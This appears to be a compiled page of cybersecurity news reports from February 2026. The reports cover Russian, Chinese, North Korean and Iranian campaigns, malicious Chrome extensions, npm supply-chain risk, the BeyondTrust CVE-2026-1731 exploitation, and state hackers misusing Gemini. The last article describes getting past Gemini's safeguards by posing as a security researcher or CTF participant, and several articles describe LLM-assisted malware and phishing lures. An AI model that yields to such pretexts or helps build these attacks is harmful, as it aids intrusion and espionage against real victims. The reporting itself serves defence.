2026-02-15 AI创业新闻

Google Ties Suspected Russian Actor to CANFAIL Malware Attacks on Ukrainian Orgs

A previously undocumented threat actor has been attributed to attacks targeting Ukrainian organizations with malware known as CANFAIL . Google Threat Intelligence Group (GTIG) described the hacking group as possibly affiliated with Russian intelligence services. The threat actor is assessed to have targeted defense, military, government, and energy organizations within the Ukrainian regional and national governments. However, the group has also exhibited growing interest in aerospace organizations, manufacturing companies with military and drone ties, nuclear and chemical research organizations, and international organizations involved in conflict monitoring and humanitarian aid in Ukraine, GTIG added.

“Despite being less sophisticated and resourced than other Russian threat groups, this actor recently began to overcome some technical limitations using LLMs [large language models],” GTIG said . “Through prompting, they conduct reconnaissance, create lures for social engineering, and seek answers to basic technical questions for post-compromise activity and C2 infrastructure setup.” Recent phishing campaigns have involved the threat actor impersonating legitimate national and local Ukrainian energy organizations to obtain unauthorized access to organizational and personal email accounts. The group is also said to have masqueraded as a Romanian energy company that works with customers in Ukraine, in addition to targeting a Romanian firm and conducting reconnaissance on Moldovan organizations. To enable its operations, the threat actor generates email address lists tailored to specific regions and industries based on their research.

The attack chains seemingly contain LLM-generated lures and embed Google Drive links pointing to a RAR archive containing CANFAIL malware. Typically disguised with a double extension to pass off as a PDF document (*.pdf.js), CANFAIL is an obfuscated JavaScript malware that’s designed to execute a PowerShell script that, in turn, downloads and executes a memory-only PowerShell dropper. In parallel, it displays a fake “error” message to the victim. Google said the threat actor is also linked to a campaign called PhantomCaptcha that was disclosed by SentinelOne SentinelLABS in October 2025 as targeting organizations associated with Ukraine’s war relief efforts through phishing emails that direct recipients to fake pages hosting ClickFix-style instructions to activate the infection sequence and deliver a WebSocket-based trojan.

Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Google Links China, Iran, Russia, North Korea to Coordinated Defense Sector Cyber Operations

Several state-sponsored actors, hacktivist entities, and criminal groups from China, Iran, North Korea, and Russia have trained their sights on the defense industrial base (DIB) sector, according to findings from Google Threat Intelligence Group (GTIG). The tech giant’s threat intelligence division said the adversarial targeting of the sector is centered around four key themes: striking defense entities deploying technologies on the battlefield in the Russia-Ukraine War, directly approaching employees and exploitation of the hiring process by North Korean and Iranian actors, use of edge devices and appliances as initial access pathways for China-nexus groups, and supply chain risk stemming from the breach of the manufacturing sector. “Many of the chief state-sponsors of cyber espionage and hacktivist actors have shown an interest in autonomous vehicles and drones, as these platforms play an increasing role in modern warfare,” GTIG said . “Further, the ‘evasion of detection’ trend […] continues, as actors focus on single endpoints and individuals, or carry out intrusions in a manner that seeks to avoid endpoint detection and response (EDR) tools altogether.” Some of the notable threat actors that have participated in the activity include - APT44 (aka Sandworm) has attempted to exfiltrate information from Telegram and Signal encrypted messaging applications, likely after securing physical access to devices obtained during on-ground operations in Ukraine.

This includes the use of a Windows batch script called WAVESIGN to decrypt and exfiltrate data from Signal’s desktop app. TEMP.Vermin (aka UAC-0020) has used malware like VERMONSTER, SPECTRUM (aka SPECTR), and FIRMACHAGENT using lure content revolving around drone production and development, anti-drone defense systems, and video surveillance security systems. UNC5125 (aka FlyingYeti and UAC-0149) has conducted highly targeted campaigns focusing on frontline drone units. It has used a questionnaire hosted on Google Forms to conduct reconnaissance against prospective drone operators, and distributed via messaging apps malware like MESSYFORK (aka COOKBOX) to an Unmanned Aerial Vehicle (UAV) operator based in Ukraine.

UNC5125 is also said to have leveraged an Android malware called GREYBATTLE, a bespoke version of the Hydra banking trojan, to steal credentials and data by distributing it via a website spoofing a Ukrainian military artificial intelligence company. UNC5792 (aka UAC-0195) has exploited secure messaging apps to target Ukrainian military and government entities, as well as individuals and organizations in Moldova, Georgia, France, and the U.S. The threat actor is notable for weaponizing Signal’s device linking feature to hijack victim accounts. UNC4221 (aka UAC-0185) has also targeted secure messaging apps used by Ukrainian military personnel, using tactics similar to UNC5792.

The threat actor has also leveraged an Android malware called STALECOOKIE that mimics Ukraine’s battlefield management platform DELTA to steal browser cookies. Another tactic employed by the group is the use of ClickFix to deliver the TINYWHALE downloader that, in turn, drops the MeshAgent remote management software. UNC5976 , a Russian espionage cluster that has conducted a phishing campaign delivering malicious RDP connection files that are configured to communicate with actor-controlled domains mimicking a Ukrainian telecommunications company. UNC6096 , a Russian espionage cluster that has conducted malware delivery operations via WhatsApp using DELTA-related themes to deliver a malicious LNK shortcut within an archive file that downloads a secondary payload.

Attacks aimed at Android devices have been found to deliver malware called GALLGRAB that collects locally stored files, contact information, and potentially encrypted user data from specialized battlefield applications. UNC5114 , a suspected Russian espionage cluster that has delivered a variant of an off-the-shelf Android malware called CraxsRAT by masquerading it as an update for Kropyva , a combat control system used in Ukraine. APT45 (aka Andariel) has targeted South Korean defense, semiconductor, and automotive manufacturing entities with SmallTiger malware. APT43 (aka Kimsuky) has likely leveraged infrastructure mimicking German and U.S.

defense-related entities to deploy a backdoor called THINWAVE. UNC2970 (aka Lazarus Group) has conducted the Operation Dream Job campaign to target aerospace, defense, and energy sectors, in addition to relying on artificial intelligence (AI) tools to conduct reconnaissance on its targets. UNC1549 (aka Nimbus Manticore) has targeted aerospace, aviation, and defense industries in the Middle East with malware families like MINIBIKE, TWOSTROKE, DEEPROOT, and CRASHPAD. The group is known to orchestrate Lazarus Group-style Dream Job campaigns to trick users into executing malware or giving up credentials under the guise of legitimate employment opportunities.

UNC6446 , an Iranian-nexus threat actor that has used resume builder and personality test applications to distribute custom malware to targets in the aerospace and defense vertical across the U.S. and the Middle East. APT5 (aka Keyhole Panda and Mulberry Typhoon) has targeted current and former employees of major aerospace and defense contractors with tailored phishing lures. UNC3236 (aka Volt Typhoon) has conducted reconnaissance activity against publicly hosted login portals of North American military and defense contractors, while using the ARCMAZE obfuscation framework to conceal its origin.

UNC6508 , a China-nexus threat cluster that targeted a U.S.-based research institution in late 2023 by leveraging a REDCap exploit to drop a custom malware named INFINITERED that’s capable of persistent remote access and credential theft after intercepting the application’s software upgrade process. In addition, Google said it has also observed China-nexus threat groups utilizing operational relay box (ORB) networks for reconnaissance against defense industrial targets, thereby complicating detection and attribution efforts. ORBs confer several advantages to threat actors, allowing them to route their traffic through home or commercial networks, blend with regular network traffic, circumvent geofencing security controls, and pre-position themselves to a target’s perimeter ahead of a cyber attack. ORBs are also resilient to takedown attempts, as attackers managing them can scale these networks to add more devices, even if some nodes are discovered and blocked.

“While specific risks vary by geographic footprint and sub-sector specialization, the broader trend is clear: the defense industrial base is under a state of constant, multi-vector siege,” Google said. “Financially motivated actors carry out extortion against this sector and the broader manufacturing base, like many of the other verticals they target for monetary gain.” “The campaigns against defense contractors in Ukraine, threats to or exploitation of defense personnel, the persistent volume of intrusions by China-nexus actors, and the hack, leak, and disruption of the manufacturing base are some of the leading threats to this industry today.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

UAT-9921 Deploys VoidLink Malware to Target Technology and Financial Sectors

A previously unknown threat actor tracked as UAT-9921 has been observed leveraging a new modular framework called VoidLink in its campaigns targeting the technology and financial services sectors, according to findings from Cisco Talos. “This threat actor seems to have been active since 2019, although they have not necessarily used VoidLink over the duration of their activity,” researchers Nick Biasini, Aaron Boyd, Asheer Malhotra, and Vitor Ventura said . “UAT-9921 uses compromised hosts to install VoidLink command-and-control (C2), which are then used to launch scanning activities both internal and external to the network.” VoidLink was first documented by Check Point last month, describing it as a feature-rich malware framework written in Zig designed for long-term, stealthy access to Linux-based cloud environments. It’s assessed to be the work of a single developer with assistance from a large language model (LLM) to flesh out its internals based on a paradigm called spec-driven development .

In another analysis published earlier this week, Ontinue pointed out that the emergence of VoidLink presents a new concern where LLM-generated implants, packed with kernel-level rootkits and features to target cloud environments, can further lower the skill barrier required to produce hard-to-detect malware. Per Talos, UAT-9921 is believed to possess knowledge of the Chinese language, given the language of the framework and code comments present in it. The toolkit is said to be a recent addition to its arsenal. It is also believed that the development was split across teams, although the extent of the demarcation between development and the actual operations remains unclear.

“The operators deploying VoidLink have access to the source code of some [kernel] modules and some tools to interact with the implants without the C2,” the researchers noted. “This indicates inner knowledge of the communication protocols of the implants.” VoidLink is deployed as a post-compromise tool, allowing the adversary to sidestep detection. The threat actor has also been observed deploying a SOCKS proxy on compromised servers to launch scans for internal reconnaissance and lateral movement using open-source tools like Fscan . The cybersecurity company said it’s aware of multiple VoidLink-related victims dating back to September 2025, indicating that work on the malware may have commenced much earlier than the November 2025 timeline pieced together by Check Point.

When reached for comment regarding the latest findings, Pedro Drimel Neto, malware analysis lead at Check Point Software, told The Hacker News via email that they have not observed evidence of VoidLink “being used as of September 2025 and threat actor activity since 2019,” and that “we cannot independently verify activity outside of the datasets and sources available to us.” VoidLink uses three different programming languages: ZigLang for the implant, C for the plugins, and GoLang for the backend. It supports compilation on demand for plugins, providing support for the different Linux distributions that might be targeted. The plugins allow for gathering information, lateral movement, and anti-forensics. The framework also comes fitted with a wide range of stealth mechanisms to hinder analysis, prevent its removal from the infected hosts, and even detect endpoint detection and response (EDR) solutions and devise an evasion strategy on the fly.

“The C2 will provide that implant with a plugin to read a specific database the operator has found or an exploit for a known vulnerability, which just happens to be on an internal web server,” Talos said. “The C2 doesn’t necessarily need to have all these tools available — it may have an agent that will do its research and prepare the tool for the operator to use. With the current VoidLink compile-on-demand capability, integrating such a feature should not be complex. Keep in mind that all of this will happen while the operator continues to explore the environment.” Another defining trait of VoidLink is its auditability and the existence of a role-based access control (RBAC) mechanism, which consists of three role levels: SuperAdmin, Operator, and Viewer.

This suggests that the developers of the framework kept oversight in mind when designing it, raising the possibility that the activity may be part of red team exercises. What’s more, there are signs that there exists a main implant that has been compiled for Windows and can load plugins via a technique called DLL side-loading. “This is a near-production-ready proof of concept,” Talos said. “VoidLink is positioned to become an even more powerful framework based on its capabilities and flexibility.” Found this article interesting?

Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

AI Security Board Report Template

Malicious Chrome Extensions Caught Stealing Business Data, Emails, and Browsing History

Cybersecurity researchers have discovered a malicious Google Chrome extension that’s designed to steal data associated with Meta Business Suite and Facebook Business Manager. The extension, named CL Suite by @CLMasters (ID: jkphinfhmfkckkcnifhjiplhfoiefffl), is marketed as a way to scrape Meta Business Suite data, remove verification pop-ups, and generate two-factor authentication (2FA) codes. The extension has 33 users as of writing. It was first uploaded to the Chrome Web Store on March 1, 2025.

However, the browser add-on also exfiltrates TOTP codes for Facebook and Meta Business accounts, Business Manager contact lists, and analytics data to infrastructure controlled by the threat actor, Socket said. “The extension requests broad access to meta.com and facebook.com and claims in its privacy policy that 2FA secrets and Business Manager data remain local,” security researcher Kirill Boychenko said . “In practice, the code transmits TOTP seeds and current one-time security codes, Meta Business ‘People’ CSV exports, and Business Manager analytics data to a backend at getauth[.]pro, with an option to forward the same payloads to a Telegram channel controlled by the threat actor.” By targeting users of Meta Business Suite and Facebook Business Manager, the threat actor behind the operation has leveraged the extension to conduct data collection and exfiltration without users’ knowledge or consent. While the extension does not have capabilities to steal password-related information, the attacker could obtain such information beforehand from other sources, such as infostealer logs or credential dumps, and then use the stolen codes to gain unauthorized access to victims’ accounts.

The full scope of the malicious add-on’s capabilities is listed below - Steal TOTP seed (a unique, alphanumeric code that’s used to generate time-based one-time passwords) and 2FA code Target Business Manager “People” view by navigating to facebook[.]com and meta[.]com and build a CSV file with names, email addresses, roles and permissions, and their status and access details. Enumerate Business Manager-level entities and their linked assets and build a CSV file of Business Manager IDs and names, attached ad accounts, connected pages and assets, and billing and payment configuration details. Socket warned that despite the low number of installs, the extension gives the threat actor enough information to identify high-value targets and mount follow-on attacks. “CL Suite by @CLMasters shows how a narrow browser extension can repackage data scraping as a ‘tool’ for Meta Business Suite and Facebook Business Manager,” Boychenko said.

“Its people extraction, Business Manager analytics, popup suppression, and in-browser 2FA generation are not neutral productivity features, they are purpose-built scrapers for high-value Meta surfaces that collect contact lists, access metadata, and 2FA material straight from authenticated pages.” Chrome Extensions Hijack VKontakte Accounts The disclosure comes as Koi Security found that about 500,000 VKontakte users have had their accounts silently hijacked through Chrome extensions masquerading as VK customization tools. The large-scale campaign has been codenamed VK Styles . The malware embedded in the extensions is designed to engage in active account manipulation by automatically subscribing users to the attacker’s VK groups, resetting account settings every 30 days to override user preferences, manipulating Cross-Site Request Forgery (CSRF) tokens to bypass VK’s security protections, and maintaining persistent control. The activity has been traced to a threat actor operating under the GitHub username 2vk, who has relied on VK’s own social network to distribute malicious payloads and build a follower base through forced subscriptions.

The names of the extensions are listed below - VK Styles - Themes for vk.com (ID: ceibjdigmfbbgcpkkdpmjokkokklodmc) VK Music - audio saver (ID: mflibpdjoodmoppignjhciadahapkoch) Music Downloader - VKsaver (ID: lgakkahjfibfgmacigibnhcgepajgfdb) vksaver - music saver vk (ID: bndkfmmbidllaiccmpnbdonijmicaafn) VKfeed - Download Music and Video from VK (ID: pcdgkgbadeggbnodegejccjffnoakcoh) One of the defining traits of the campaign is the use of a VK profile’s (“vk[.]com/m0nda”) HTML metadata tags as a dead drop resolver to conceal the next-stage payload URLs and, therefore, evade detection. The next-stage payload is hosted in a public repository named “-“ that’s associated with 2vk. Present in the payload is obfuscated JavaScript that’s injected into every VK page the victim visits. The repository is still accessible as of writing, with the file, simply named “C,” receiving a total of 17 commits between June 2025 and January 2026, as the operator refined and added new functionality.

“Each commit shows deliberate refinement,” security researcher Ariel Cohen said. “This isn’t sloppy malware - it’s a maintained software project with version control, testing, and iterative improvements.” VK Styles has primarily affected Russian-speaking users, who are VK’s main demographic, as well as users across Eastern Europe, Central Asia, and Russian diaspora communities globally. The campaign is assessed to be active since at least June 22, 2025, when the initial version of the payload was pushed to the “-“ repository. Fake AI Chrome Extensions Steal Credentials, Emails The findings also coincide with the discovery of another coordinated campaign dubbed AiFrame , where a cluster of 32 browser add-ons advertised as artificial intelligence (AI) assistants for summarization, chat, writing, and Gmail assistance are being used to siphon sensitive data.

These extensions have been collectively installed by more than 260,000 users. “While these tools appear legitimate on the surface, they hide a dangerous architecture: instead of implementing core functionality locally, they embed remote, server-controlled interfaces inside extension-controlled surfaces and act as privileged proxies, granting remote infrastructure access to sensitive browser capabilities,” LayerX researcher Natalie Zargarov said . The names of the malicious extensions are as follows - AI Assistant (ID: nlhpidbjmmffhoogcennoiopekbiglbp) Llama (ID: gcfianbpjcfkafpiadmheejkokcmdkjl) Gemini AI Sidebar (ID: fppbiomdkfbhgjjdmojlogeceejinadg) AI Sidebar (ID: djhjckkfgancelbmgcamjimgphaphjdl) ChatGPT Sidebar (ID: llojfncgbabajmdglnkbhmiebiinohek) AI Sidebar (ID: gghdfkafnhfpaooiolhncejnlgglhkhe) Grok (ID: cgmmcoandmabammnhfnjcakdeejbfimn) Asking Chat Gpt (ID: phiphcloddhmndjbdedgfbglhpkjcffh) ChatGBT (ID: pgfibniplgcnccdnkhblpmmlfodijppg) Chat Bot GPT (ID: nkgbfengofophpmonladgaldioelckbe) Grok Chatbot (ID: gcdfailafdfjbailcdcbjmeginhncjkb) Chat With Gemini (ID: ebmmjmakencgmgoijdfnbailknaaiffh) XAI (ID: baonbjckakcpgliaafcodddkoednpjgf) Google Gemini (ID: fdlagfnfaheppaigholhoojabfaapnhb) Ask Gemini (ID: gnaekhndaddbimfllbgmecjijbbfpabc) AI Letter Generator (ID: hgnjolbjpjmhepcbjgeeallnamkjnfgi) AI Message Generator (ID: lodlcpnbppgipaimgbjgniokjcnpiiad) AI Translator (ID: cmpmhhjahlioglkleiofbjodhhiejhei) AI For Translation (ID: bilfflcophfehljhpnklmcelkoiffapb) AI Cover Letter Generator (ID: cicjlpmjmimeoempffghfglndokjihhn) AI Image Generator Chat GPT (ID: ckneindgfbjnbbiggcmnjeofelhflhaj) Ai Wallpaper Generator (ID: dbclhjpifdfkofnmjfpheiondafpkoed) Ai Picture Generator (ID: ecikmpoikkcelnakpgaeplcjoickgacj) DeepSeek Download (ID: kepibgehhljlecgaeihhnmibnmikbnga) AI Email Writer (ID: ckicoadchmmndbakbokhapncehanaeni) Email Generator AI (ID: fnjinbdmidgjkpmlihcginjipjaoapol) DeepSeek Chat (ID: gohgeedemmaohocbaccllpkabadoogpl) ChatGPT Picture Generator (ID: flnecpdpbhdblkpnegekobahlijbmfok) ChatGPT Translate (ID: acaeafediijmccnjlokgcdiojiljfpbe) AI GPT (ID: kblengdlefjpjkekanpoidgoghdngdgl) ChatGPT Translation (ID: idhknpoceajhnjokpnbicildeoligdgh) Chat GPT for Gmail (ID: fpmkabpaklbhbhegegapfkenkmpipick) Once installed, these extensions render a full-screen iframe overlay pointing to a remote domain (“claude.tapnetic[.]pro”), allowing the attackers to remotely introduce new capabilities without requiring a Chrome Web Store update. When instructed by the iframe, the add-ons query the active browser tab and invoke a content script to extract readable article content using Mozilla’s Readability library.

The malware also supports the capability to start speech recognition and exfiltrate the resulting transcript to the remote page. What’s more, a smaller set of the extensions contain functionality to specifically target Gmail by reading visible email content directly from the document object model (DOM) when a victim visits mail.google[.]com. “When Gmail-related features such as AI-assisted replies or summaries are invoked, the extracted email content is passed into the extension’s logic and transmitted to third-party backend infrastructure controlled by the extension operator,” LayerX said. “As a result, email message text and related contextual data may be sent off-device, outside of Gmail’s security boundary, to remote servers.” 287 Chrome Extensions Exfiltrate Browsing History The developments show how web browser extensions are increasingly being abused by bad actors to harvest and exfiltrate sensitive data by passing them off as seemingly legitimate tools and utilities.

A report published by Q Continuum last week found a huge collection of 287 Chrome extensions that exfiltrate browsing history to data brokers. These extensions have 37.4 million installations, representing roughly 1% of the global Chrome userbase. “It was shown in the past that Chrome extensions are used to exfiltrate user browser history that is then collected by data brokers such as Similarweb and Alexa,” the researcher said . Given the risks involved, users are recommended to adopt a minimalist approach by only installing necessary, well-reviewed tools from official stores.

It’s also essential to periodically audit installed extensions for any signs of malicious behavior or excessive permission requests. Other ways that users and organizations can ensure greater security include using separate browser profiles for sensitive tasks and implementing extension allowlisting to block those that are malicious or non-compliant. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

npm’s Update to Harden Their Supply Chain, and Points to Consider

In December 2025, in response to the Sha1-Hulud incident, npm completed a major authentication overhaul intended to reduce supply-chain attacks. While the overhaul is a solid step forward, the changes don’t make npm projects immune from supply-chain attacks. npm is still susceptible to malware attacks – here’s what you need to know for a safer Node community. Let’s start with the original problem Historically, npm relied on classic tokens: long-lived, broadly scoped credentials that could persist indefinitely.

If stolen, attackers could directly publish malicious versions to the author’s packages (no publicly verifiable source code needed). This made npm a prime vector for supply-chain attacks. Over time, numerous real-world incidents demonstrated this point. Shai-Hulud, Sha1-Hulud, and chalk/debug are examples of recent, notable attacks.

npm’s solution To address this, npm made the following changes: npm revoked all classic tokens and defaulted to session-based tokens instead. The npm team also improved token management. Interactive workflows now use short-lived session tokens (typically two hours) obtained via npm login, which defaults to MFA for publishing. The npm team also encourages OIDC Trusted Publishing, in which CI systems obtain short-lived, per-run credentials rather than storing secrets at rest.

In combination, these practices improve security. They ensure credentials expire quickly and require a second factor during sensitive operations. Two important issues remain First, people need to remember that the original attack on tools like ChalkJS was a successful MFA phishing attempt on npm’s console. If you look at the original email attached below, you can see it was an MFA-focused phishing email (nothing like trying to do the right thing and still getting burned).

The campaign tricked the maintainer into sharing both the user login and one-time password. This means in the future, similar emails could get short-lived tokens, which still give attackers enough time to upload malware (since that would only take minutes). Second, MFA on publish is optional. Developers can still create 90-day tokens with MFA bypass enabled in the console, which are extremely similar to the classic tokens from before.

These tokens allow you to read and write to a token author’s maintained packages. This means that if bad actors gain access to a maintainer’s console with these token settings, they can publish new, malicious packages (and versions) on that author’s behalf. This circles us back to the original issue with npm before they adjusted their credential policies. To be clear, more developers using MFA on publish is good news, and future attacks should be fewer and smaller.

However, making OIDC and MFA on-publish optional still leaves the core issue unresolved. In conclusion, if (1) MFA phishing attempts to npm’s console still work and (2) access to the console equals access to publish new packages/versions, then developers need to be aware of the supply-chain risks that still exist. Recommendations In the spirit of open source security, here are three recommendations that we hope GitHub and npm will consider in the future. Ideally, they continue to push for the ubiquity of OIDC in the long term.

OIDC is very hard to compromise and would almost completely erase the issues surrounding supply-chain attacks. More realistically, enforcing MFA for local package uploads (either via an email code or a one-time password) would further reduce the blast radius of worms like Shai-Hulud. In other words, it would be an improvement to not allow custom tokens that bypass MFA. At a minimum, it would be nice to add metadata to package releases, so developers can take precautions and avoid packages (or maintainers) who do not take supply chain security measures.

In short, npm has taken an important step forward by eliminating permanent tokens and improving defaults. Until short-lived, identity-bound credentials become the norm — and MFA bypass is no longer required for automation — supply-chain risk from compromised build systems remains materially present. A new way to do it This entire time, we’ve been talking about supply-chain attacks by uploading packages to npm on a maintainer’s behalf. If we could build every npm package from verifiable upstream source code rather than downloading the artifact from npm, we’d be better off.

That’s exactly what Chainguard does for its customers with Chainguard Libraries for JavaScript. We’ve looked at the public database for compromised packages across npm and discovered that for 98.5% of malicious packages, the malware was not present in the upstream source code (just the published artifact). This means an approach of building from source would reduce your attack surface by some 98.5%, based on past data, because Chainguard’s JavaScript repository would never publish the malicious versions available on npm. In an ideal world, customers are most secure when they use Chainguard Libraries and apply the recommendations above.

Per the “Swiss cheese model of security,” all of these features are layers of additive security measures, and companies would be best off using a combination of them. If you’d like to learn more about Chainguard Libraries for JavaScript, reach out to our team . Note: This article was thoughtfully written and contributed for our audience by Adam La Morre, Senior Solutions Engineer at Chainguard. Found this article interesting?

This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

AI Security Isn’t Optional—Join the Conversation at SANS Security West

Researchers Observe In-the-Wild Exploitation of BeyondTrust CVSS 9.9 Vulnerability

Threat actors have started to exploit a recently disclosed critical security flaw impacting BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA) products, according to watchTowr. “Overnight we observed first in-the-wild exploitation of BeyondTrust across our global sensors,” Ryan Dewhurst, head of threat intelligence at watchTowr, said in a post on X. “Attackers are abusing get_portal_info to extract the x-ns-company value before establishing a WebSocket channel.” The vulnerability in question is CVE-2026-1731 (CVS score: 9.9), which could allow an unauthenticated attacker to achieve remote code execution by sending specially crafted requests. BeyondTrust noted last week that successful exploitation of the shortcoming could allow an unauthenticated remote attacker to execute operating system commands in the context of the site user, resulting in unauthorized access, data exfiltration, and service disruption.

It has been patched in the following versions. All PRA versions 25.1 and greater do not require patching for this vulnerability. Please update the version numbers - Remote Support - Patch BT26-02-RS (v21.3 - 25.3.1) Privileged Remote Access - Patch BT26-02-PRA (v22.1 - 24.X) GreyNoise said Defused Cyber has also confirmed in-the-wild exploitation attempts of CVE-2026-1731, with the former noting that it observed reconnaissance efforts targeting the vulnerability less than 24 hours after the availability of a proof-of-concept (PoC) exploit. “A single IP accounts for 86% of all observed reconnaissance sessions so far.

It’s associated with a commercial VPN service hosted by a provider in Frankfurt,” the company said . “This isn’t a new actor; it’s an established scanning operation that rapidly added CVE-2026-1731 checks to its toolkit.” The use of CVE-2026-1731 demonstrates how quickly threat actors can weaponize new vulnerabilities, significantly shrinking the window for defenders to patch critical systems. CISA Adds 4 Flaws to KEV Catalog The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added four vulnerabilities to its Known Exploited Vulnerabilities ( KEV ) catalog, citing evidence of active exploitation.

The list of vulnerabilities is as follows - CVE-2026-20700 (CVSS score: 7.8) - An improper restriction of operations within the bounds of a memory buffer vulnerability in Apple iOS, macOS, tvOS, watchOS, and visionOS that could allow an attacker with memory write capability to execute arbitrary code. CVE-2025-15556 (CVSS score: 7.7) - A download of code without an integrity check vulnerability in Notepad++ that could allow an attacker to intercept or redirect update traffic to download and execute an attacker-controlled installer and lead to arbitrary code execution with the privileges of the user. CVE-2025-40536 (CVSS score: 8.1) - A security control bypass vulnerability in SolarWinds Web Help Desk that could allow an unauthenticated attacker to gain access to certain restricted functionality. CVE-2024-43468 (CVSS score: 9.8) - An SQL injection vulnerability in Microsoft Configuration Manager that could allow an unauthenticated attacker to execute commands on the server and/or underlying database by sending specially crafted requests.

It’s worth noting that CVE-2024-43468 was patched by Microsoft in October 2024 as part of its Patch Tuesday updates. It’s currently unclear how this vulnerability is being exploited in real-world attacks. Nor is there any information about the identity of the threat actors exploiting the flaw and the scale of such efforts. The addition of CVE-2024-43468 to the KEV catalog follows a recent report from Microsoft about a multi‑stage intrusion that involved the threat actors exploiting internet‑exposed SolarWinds Web Help Desk (WHD) instances to obtain initial access and move laterally across the organization’s network to other high-value assets.

However, the Windows maker said it’s not evident if the attacks exploited CVE-2025-40551, CVE-2025-40536, or CVE-2025-26399, since attacks occurred in December 2025 and on machines vulnerable to both the old and new sets of vulnerabilities. As for CVE-2026-20700, Apple acknowledged that the shortcoming may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 26, raising the possibility that it was leveraged to deliver commercial spyware. It was fixed by the tech giant earlier this week. Lastly, the exploitation of CVE-2025-15556 has been attributed by Rapid7 to a China-linked state-sponsored threat actor called Lotus Blossom (aka Billbug, Bronze Elgin, G0030, Lotus Panda, Raspberry Typhoon, Spring Dragon, and Thrip).

It’s known to be active since at least 2009. The targeted attacks have been found to deliver a previously undocumented backdoor called Chrysalis. While the supply chain attack was fully plugged on December 2, 2025, the compromise of the Notepad++ update pipeline is estimated to have spanned nearly five months between June and October 2025. The DomainTools Investigations (DTI) team described the incident as precise and a “quiet, methodical intrusion” that points to a covert intelligence-gathering mission designed to keep operational noise as low as possible.

It also characterized the threat actor as having a penchant for long dwell times and multi-year campaigns. An important aspect of the campaign is that the Notepad++ source code was left intact, instead relying on trojanized installers to deliver the malicious payloads. This, in turn, allowed the attackers to bypass source-code reviews and integrity checks, effectively enabling them to stay undetected for extended periods, DTI added. “From their foothold inside the update infrastructure, the attackers did not indiscriminately push malicious code to the global Notepad++ user base,” it said .

“Instead, they exercised restraint, selectively diverting update traffic for a narrow set of targets, organizations, and individuals whose positions, access, or technical roles made them strategically valuable.” “By abusing a legitimate update mechanism relied upon specifically by developers and administrators, they transformed routine maintenance into a covert entry point for high-value access. The campaign reflects continuity in purpose, a sustained focus on regional strategic intelligence, executed with more sophisticated, more subtle, and harder-to-detect methods than in prior iterations.” LevelBlue SpiderLabs, in a report investigating the Notepad++ update breach, has urged users to upgrade Notepad++ to version 8.9.1 or later, optionally disable the WinGUp auto-updater during installation, and ensure the update utility communicates only with legitimate update servers. In light of active exploitation of these vulnerabilities, Federal Civilian Executive Branch (FCEB) agencies have until February 15, 2026, to address CVE-2025-40536, and till March 5, 2026, to fix the remaining three. Update The U.S.

Cybersecurity and Infrastructure Security Agency (CISA), on February 13, 2026, added CVE-2026-1731 to its Known Exploited Vulnerabilities ( KEV ) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the fix by February 16, 2026. Researchers from security firm Arctic Wolf have detected attacks that target Remote Support and Privileged Remote Access deployments through CVE-2026-1731, attempting to deploy the SimpleHelp remote management and monitoring (RMM) tool for persistence and perform lateral movement to other systems on the network. “AdsiSearcher was used to obtain Active Directory computer inventory,” Arctic Wolf said . “PSexec was used to execute the SimpleHelp installation across multiple devices in affected environments.

We also observed Impacket SMBv2 session setup requests early in affected environments.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Google Reports State-Backed Hackers Using Gemini AI for Recon and Attack Support

Google on Thursday said it observed the North Korea-linked threat actor known as UNC2970 using its generative artificial intelligence (AI) model Gemini to conduct reconnaissance on its targets, as various hacking groups continue to weaponize the tool for accelerating various phases of the cyber attack life cycle, enabling information operations, and even conducting model extraction attacks. “The group used Gemini to synthesize OSINT and profile high-value targets to support campaign planning and reconnaissance,” Google Threat Intelligence Group (GTIG) said in a report shared with The Hacker News. “This actor’s target profiling included searching for information on major cybersecurity and defense companies and mapping specific technical job roles and salary information.” The tech giant’s threat intelligence team characterized this activity as a blurring of boundaries between what constitutes routine professional research and malicious reconnaissance, allowing the state-backed actor to craft tailored phishing personas and identify soft targets for initial compromise. UNC2970 is the moniker assigned to a North Korean hacking group that overlaps with a cluster that’s tracked as Lazarus Group, Diamond Sleet, and Hidden Cobra.

It’s best known for orchestrating a long-running campaign codenamed Operation Dream Job to target aerospace, defense, and energy sectors with malware under the guise of approaching victims under the pretext of job openings. GTIG said UNC2970 has “consistently” focused on defense targeting and impersonating corporate recruiters in their campaigns, with the target profiling including searches for “information on major cybersecurity and defense companies and mapping specific technical job roles and salary information.” UNC2970 is far from the only threat actor to have misused Gemini to augment their capabilities and move from initial reconnaissance to active targeting at a faster clip. Some of the other hacking crews that have integrated the tool into their workflows are as follows - UNC6418 (Unattributed), to conduct targeted intelligence gathering, specifically seeking out sensitive account credentials and email addresses. Temp.HEX or Mustang Panda (China), to compile a dossier on specific individuals, including targets in Pakistan, and to gather operational and structural data on separatist organizations in various countries.

APT31 or Judgement Panda (China), to automate the analysis of vulnerabilities and generate targeted testing plans by claiming to be a security researcher. APT41 (China), to extract explanations from open-source tool README.md pages, as well as troubleshoot and debug exploit code. UNC795 (China), to troubleshoot their code, conduct research, and develop web shells and scanners for PHP web servers. APT42 (Iran), to facilitate reconnaissance and targeted social engineering by crafting personas that induce engagement from the targets, as well as develop a Python-based Google Maps scraper, develop a SIM card management system in Rust, and research the use of a proof-of-concept (PoC) for a WinRAR flaw ( CVE-2025-8088 ).

One recurring avenue for abuse of generative AI models like Gemini occurs when threat actors reframe their prompts by identifying themselves as a security researcher or a participant in a capture-the-flag (CTF) exercise to trick the system into generating unexpected responses. Steve Miller, AI threat lead at GTIG, told The Hacker News that the company is constantly improving its safety mechanisms to combat such scenarios. “Google is always working to improve our safety systems, including detection classifiers, mitigations and other safeguards to prevent misuse by threat actors,” Miller said. “As adversaries experience friction in misusing our systems, they begin to experiment with new ways to bypass the safeguards – and though we see lots of these experiments, they are not always successful.

